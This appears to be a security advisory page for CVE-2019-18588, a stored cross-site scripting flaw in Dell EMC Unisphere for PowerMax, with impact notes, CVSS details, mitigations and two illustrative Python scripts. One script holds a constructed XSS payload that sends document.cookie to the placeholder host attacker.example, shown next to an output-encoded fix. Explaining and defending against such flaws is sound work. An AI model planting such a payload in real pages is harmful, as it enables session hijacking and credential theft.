CRITICAL · CVE-2019-18588 · CVSS 9.0

Dell EMC Unisphere for PowerMax versions prior to 9.1.0.9, Dell EMC Unisphere for PowerMax versions prior to 9.0.2.16, and Dell EMC PowerMax OS 5978.221.221 and 5978.479.479 contain a cross-site scripting (XSS) vulnerability.

Platform

other

Component

unisphere-for-powermax

Fixed versions

9.1.0.9

9.0.2.16

AI Confidence: high · NVD · EPSS 0.5% · Reviewed: May 2026

CVE-2019-18588 describes a cross-site scripting (XSS) vulnerability in Dell EMC Unisphere for PowerMax versions prior to 9.1.0.9 (9.1 branch) and prior to 9.0.2.16 (9.0 branch). An authenticated malicious user can inject JavaScript that is executed in the browsers of other authenticated users, potentially compromising their sessions. The vulnerability was published on January 10, 2020; fixes are available in versions 9.1.0.9 and 9.0.2.16.

Impact and attack scenarios

The XSS vulnerability in Unisphere for PowerMax allows an authenticated attacker to inject arbitrary JavaScript that executes in the browsers of other authenticated users who view the affected page. The script runs inside the victim's session, so the attacker can hijack that session or issue management requests as the victim, and can read whatever the victim's pages expose, such as array configuration data. Exploitation requires an account on the Unisphere instance and a victim who views the injected content (CVSS PR:L, UI:R), but because Unisphere is an administrative interface the victim is likely to be a storage administrator, so one low-privileged account can be leveraged into administrator-level control of the PowerMax management plane (CVSS Scope: Changed). This makes the flaw particularly damaging in enterprise environments where privileged accounts are used.
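To make the mechanism concrete, here is an added example that is not Dell code (the Unisphere rendering path is not public): a server-side page fragment that splices an attacker-controlled string straight into HTML, beside the same fragment with output encoding applied, and a parser-based check that shows what a browser would actually see. The free-text field, the payload and the exfiltration host are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed payload: what an authenticated attacker might store in a
# free-text field so that it renders, and executes, in other users' sessions.
# The exfiltration host is a placeholder, not a real endpoint.
STORED_PAYLOAD = (
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
)


def render_unsafe(label: str) -> str:
    """Vulnerable pattern: user-controlled text spliced into HTML as-is."""
    return f"<td class='label'>{label}</td>"


def render_safe(label: str) -> str:
    """Hardened pattern: HTML-encode at the output point. quote=True also
    encodes ' and " so the value cannot break out of an attribute either."""
    return f"<td class='label'>{html.escape(label, quote=True)}</td>"


class _MarkupCollector(HTMLParser):
    """Records every start tag and every on* attribute the browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def active_content(fragment: str, expected_tag: str = "td"):
    """Return (unexpected tags, event-handler attributes) in a rendered fragment.
    Anything beyond the expected wrapper tag means the input became markup."""
    parser = _MarkupCollector()
    parser.feed(fragment)
    parser.close()
    extra = [t for t in parser.tags if t != expected_tag]
    return extra, parser.handlers


if __name__ == "__main__":
    print("unsafe:", active_content(render_unsafe(STORED_PAYLOAD)))
    print("safe:  ", active_content(render_safe(STORED_PAYLOAD)))
```

In the unsafe rendering the parser sees an extra img tag carrying an onerror handler, which is exactly what a victim's browser would execute; in the encoded rendering the same bytes survive only as literal text. Marking the session cookie HttpOnly blunts the document.cookie theft shown here, but it does not stop injected script from issuing authenticated requests from the victim's browser, which is why the vendor fix (encoding at the output point) is the real remedy.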

Exploitation status

No active exploitation campaigns have been publicly reported for CVE-2019-18588, and it is not listed in CISA KEV; EPSS puts the probability of exploitation activity in the next 30 days at 0.53%. No public proof-of-concept is known, but XSS in a web management interface is typically straightforward to exploit for anyone who holds an account, and the details have been public since January 2020, so the absence of a known PoC is not a reason to defer patching. The CRITICAL rating and the session-hijacking impact make it a high-priority fix.

Who is at risk

Any organization running an unpatched Unisphere for PowerMax (before 9.1.0.9 on the 9.1 branch, or before 9.0.2.16 on the 9.0 branch) is at risk. The risk is highest where several people hold accounts on the same Unisphere instance, because the attacker needs only a low-privileged login: multi-tenant or service-provider deployments where different teams or customers share a management server, and environments where operators with limited roles share an instance with full administrators, since a compromised account there can be used to reach other tenants' or administrators' sessions.

Attack timeline

  1. Disclosure

Threat intelligence

Exploit status

Proof of concept: Unknown
CISA KEV: No
Internet exposure

EPSS

0.53% (67th percentile)

CVSS vector

CVSS 3.1 · CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H · 9.0 CRITICAL
(The vector string is prefixed CVSS:3.0 while the page labels it 3.1; the metric values and the 9.0 base score are the same under either version.)

Metric                Value      What it means here
Attack Vector         Network    How the attacker reaches the target: remotely exploitable over the network, no local or physical access required.
Attack Complexity     Low        Conditions needed for exploitation: none special; exploitation is reliably repeatable.
Privileges Required   Low        Authentication needed for the attack: a valid low-privileged user account is enough.
User Interaction      Required   Victim action needed: the victim must view the page or click a link carrying the payload.
Scope                 Changed    Impact spills beyond the vulnerable component: the injected script runs in other users' browser sessions.
Confidentiality       High       Risk of data disclosure: total loss of confidentiality, all data readable.
Integrity             High       Risk of unauthorized modification: arbitrary data can be written, modified or deleted.
Availability          High       Risk of service disruption: complete crash or resource exhaustion, full denial of service.

nextguardhq.com · CVSS v3.1 base score

Affected software

Component: unisphere-for-powermax
Vendor: Dell

Affected range            Fixed version
unspecified – 9.1.0.8     9.1.0.9
unspecified – 9.0.2.15    9.0.2.16

Weakness classification (CWE)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Timeline

  1. Reserved
  2. Published (January 10, 2020)
  3. Updated
  4. EPSS updated

Mitigations and workarounds

The primary mitigation for CVE-2019-18588 is to upgrade Unisphere for PowerMax to 9.1.0.9 (9.1 branch) or 9.0.2.16 (9.0 branch) or later. The PowerMax OS releases 5978.221.221 and 5978.479.479 listed above are also affected; consult the Dell advisory for the corresponding fix. Before upgrading, review the Dell EMC release notes for compatibility issues or breaking changes. Input validation and output encoding are the vendor's fix inside the product, not something a customer can bolt onto the Unisphere UI; if an immediate upgrade is not possible, reduce exposure instead: restrict network access to the Unisphere web interface to a management network, keep the number of accounts (especially low-privileged ones) to a minimum and remove any that are no longer needed, and have administrators log out rather than leave sessions open. Review Unisphere audit logs for unexpected logins or configuration changes made under administrator accounts; a hijacked session looks like legitimate activity by the victim, so the anomaly is in what was done and when, not in the log entry itself. After upgrading, confirm that the running version is at or above the fixed build for its branch. If you want to test the fix directly, do so on a non-production instance by submitting a harmless marker such as <b>test</b> in a free-text field and confirming that it is displayed as literal text rather than rendered as markup.
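The "am I affected" check is easy to get wrong because the fix lands on two branches: 9.1.0.5 sorts above 9.0.2.16 yet is still vulnerable. The following is an added example, not Dell tooling, that applies the fixed builds named on this page branch by branch. It covers Unisphere versions only, not the PowerMax OS releases. The sample JSON, the REST path /univmax/restapi/version and the leading "V" in the version value are assumptions about the product's REST API and are not taken from this page.

```python
import json
import re

# Fixed builds per release branch, taken from the advisory text above.
# A branch newer than those listed (e.g. 9.2.x) lies outside the affected
# ranges and is treated as not affected.
FIXED_BY_BRANCH = {
    (9, 0): (9, 0, 2, 16),
    (9, 1): (9, 1, 0, 9),
}

# Constructed sample of a version response. The path /univmax/restapi/version
# and the "V" prefix are assumed from the product's REST API conventions.
SAMPLE_RESPONSE = '{"version": "V9.1.0.8"}'


def parse_version(text: str) -> tuple[int, ...]:
    """Turn 'V9.1.0.8' or '9.0.2.16' into a tuple of ints for comparison."""
    m = re.fullmatch(r"[Vv]?(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def is_affected(version: str) -> bool:
    """Branch-aware check against the fixed builds.

    9.1.0.5 is affected even though it compares greater than 9.0.2.16,
    because its own branch was not fixed until 9.1.0.9.
    """
    v = parse_version(version)
    branch = v[:2]
    fixed = FIXED_BY_BRANCH.get(branch)
    if fixed is not None:
        return v < fixed
    # Branches older than any listed (e.g. 8.x): the advisory says "prior to
    # 9.0.2.16", which covers them, so report affected and review manually.
    return branch < min(FIXED_BY_BRANCH)


def assess_response(body: str) -> dict:
    """Evaluate a JSON version response and name the build to move to."""
    version = json.loads(body)["version"]
    fixed = FIXED_BY_BRANCH.get(parse_version(version)[:2])
    return {
        "version": version,
        "affected": is_affected(version),
        "upgrade_to": ".".join(map(str, fixed)) if fixed else None,
    }


if __name__ == "__main__":
    print(assess_response(SAMPLE_RESPONSE))
```

The branch table is the part worth keeping: a plain "version >= 9.0.2.16" comparison would wave through every unpatched 9.1.0.x build.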

How to fix

Update Dell EMC Unisphere for PowerMax to version 9.1.0.9 or later on the 9.1 branch, or 9.0.2.16 or later on the 9.0 branch. This resolves the cross-site scripting (XSS) vulnerability.

Frequently asked questions

What is CVE-2019-18588 — XSS in Dell EMC Unisphere for PowerMax?

CVE-2019-18588 is a critical Cross-Site Scripting (XSS) vulnerability in Dell EMC Unisphere for PowerMax versions prior to 9.1.0.9 and 9.0.2.16, allowing authenticated attackers to inject JavaScript code.

Am I affected by CVE-2019-18588 in Dell EMC Unisphere for PowerMax?

You are affected if you are running Unisphere for PowerMax earlier than 9.1.0.9 on the 9.1 branch, or earlier than 9.0.2.16 on the 9.0 branch. Check your running version against the affected ranges listed above.

How do I fix CVE-2019-18588 in Dell EMC Unisphere for PowerMax?

Upgrade to version 9.1.0.9 or 9.0.2.16 (or later on the respective branch). Review the Dell EMC release notes before upgrading to ensure compatibility.

Is CVE-2019-18588 being actively exploited?

While no active exploitation campaigns have been publicly reported, the vulnerability's severity and potential impact warrant immediate attention and remediation.

Where can I find the official Dell EMC advisory for CVE-2019-18588?

Refer to the Dell EMC Security Advisory for CVE-2019-18588 on the Dell Support website for detailed information and mitigation steps.
